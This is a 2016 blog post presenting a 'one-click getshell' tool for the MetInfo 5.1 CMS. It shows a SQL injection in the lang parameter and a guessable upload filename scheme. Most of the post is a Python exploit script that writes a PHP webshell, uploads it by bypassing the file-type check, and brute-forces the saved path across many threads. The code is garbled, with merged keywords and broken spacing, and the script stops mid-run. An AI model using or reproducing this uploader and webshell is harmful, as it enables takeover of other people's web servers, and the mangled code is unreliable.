title: MetInfo V5.1 Getshell One-click Tool
Date: 2016-06-08 22:40:32
Categories: hacker
tags:
- Hacker
- Tools
---

# Vulnerability Analysis:

**config/config.inc.php**

```php
$langoks= $db->get_one ("SELECT * from $met _lang WHERE lang= ' $lang '");if(! $langoks) Die ('No Data in the database,please reinstall.');if(! $langoks [useok]&&! $metinfoadminok) Okinfo ('.. /404.html');if(Count ($met _langok) ==1) $lang =$met _index_type; $query="SELECT * from $met _config WHERE lang= ' $lang ' or lang= ' Metinfo '";//look at this $result .= $dbquery ($query); while($list _config= $dbFetch_array ($result)) { if($metinfoadminok) $list _config['value']=str_replace ('"','& #34;', Str_replace ("'",'& #39;', $list _config['value'])); $settings _arr[]=$list _config; if($list _config['ColumnID']) {$settings [$list _config['name'].'_'. $list _config['ColumnID']]= $list _config['value']; }Else{$settings [$list _config['name']]= $list _config['value']; }} @extract ($settings);
```

The `$lang` value (apparently taken straight from the request, as the URL below shows) is interpolated into `$query` without any escaping or parameter binding at the line marked `//look at this`, so a quote character in it changes the WHERE clause; that is the injection point. Binding `$lang` as a prepared-statement parameter, or validating it against the known language list before use, would close it.

---

<!--more-->

Accessing http://localhost/metinfo5.1/index.php?lang=metinfo' produces the query `SELECT * FROM met_config WHERE lang='metinfo'' or lang='metinfo'`

---

## File naming method:

**/feedback/uploadfile_save.php**

```php
srand (Double) microtime ()* 1000000); $rnd= rand (100, 999); $name= Date ('U') +$rnd; $name= $name.".". $ext;
```

**File saved in the /upload/file/ directory**

The naming method: the timestamp with its last three digits removed, followed by a three-digit random number, can be brute-forced: http:127.0.0.1/upload/file/1465394396. 
PHP----------#One-click Use tool:----------* * This program is written based on Python * *"' python#!/usr/bin/env python#-*-coding:utf-8-*-ImportRequestsImportQueueImportThreadingImport TimeImportsysheaders= {'user-agent':'mozilla/5.0 (Windows NT 6.1; WOW64) applewebkit/537.36 (khtml, like Gecko) chrome/52.0.2743.10 safari/537.36'}urls=Queue.queue ()#http://hb.jhxjd.com/upload/file/1441445378.phpdefBP (urls,time_out): while noturls.empty (): Base_url=Urls.get () response=NoneTry: Time.sleep (int (time_out))#Delay SettingResponse = Requests.get (base_url,headers=headers)ifResponse.status_code = = 404: Print 'Not fount----%s'%Base_urlexcept: Continue finally: ifResponse:with Open ('Url.txt','A +') as F:f.write ('%s?e=yxnzzxj0'%Base_url)defMain (target_url,thread_num,time_out):#Remove the current timestamp and delete the post four bitsnow = str (int (time.time ())) [:-4] #traverse all the pending addresses and join the queue forIinchRange (0,10): forJinchRange (100,1000): Num_str="'. Join ((str (i), str (j))) URL="'. Join ('%s/upload/file/%s'% (Target_url,now), Num_str,'. PHP') ) urls.put (URL)#Uploading FilesWith open ('xiaoma.php','w+') as Fi:fi.write ("<?php $e = $_request[' E '];register_shutdown_function (Base64_decode ($e), $_request[' Akkuman ']);? >") Data= { 'Fd_para[1][para]':'Filea', 'Fd_para[1][type]':'5'} files= {'Filea': Open ("xiaoma.php",'RB')} upload_url='%s/feedback/uploadfile_save.php?met_file_format=pphphp&met_file_maxsize=9999&lang=metinfo'%Target_url Res= Requests.post (Upload_url,data = data,files=files)#wait two seconds for file uploadTime.sleep (2)